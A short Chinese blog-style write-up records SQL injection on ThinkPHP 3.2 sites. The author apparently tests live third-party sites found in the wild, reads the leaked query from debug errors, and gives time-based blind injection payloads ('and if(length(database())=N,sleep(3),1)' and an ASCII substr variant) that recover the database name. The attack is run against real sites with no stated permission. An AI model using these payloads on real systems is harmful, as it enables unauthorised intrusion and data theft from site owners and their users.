在先知社区看到两篇关于ThinkPHP3.2版本的注入分析
https://xz.aliyun.com/t/2631
https://xz.aliyun.com/t/2629
看完想去找找案例自己试试,找了好几个,都不存在,可能是我太渣了吧
反倒是找到了两个ThinkPHP站的注入,注入点一模一样,一个有回显现,一个没有
没有回显的丢到sqlmap去跑 提示有注入但是却什么都跑不出来,懒的手工,感觉是误报就没理了
后来发现了另外一个一模一样的注入点,这个开启了debug 看到报错信息后才发现注入确实存在
只不过他的debug关闭了没那么方便注入而已,但是可以延时盲注,感觉挺好玩的,就此记录一下。
当Debug开启
加 ‘ 报错
可以看到SQL语句为
SELECT * FROM `dede_archives` INNER JOIN dede_addonarticle ON dede_archives.id = dede_addonarticle.aid WHERE ( dede_archives.id = 331 ) LIMIT 1ID = 331我们可控且不过滤,注入果断存在啊 只要闭合前面的语句就可以了 如:
当Debug关闭
采用延时盲注
猜测数据库长度 如果数据库等于猜测的长度页面延迟三秒打开,否则返回正常页面
)+and+if(length(database())=1(递增),sleep(3),1)+%23+猜测到数据库长度为6
猜数据库名 遍历ascii编码
)+and+if(ascii(substr(database(),1,1))=1(递增),sleep(5),1)+%23+
数据库长度是6 且第一个字母是 f 猜测为目标域名
记录一下。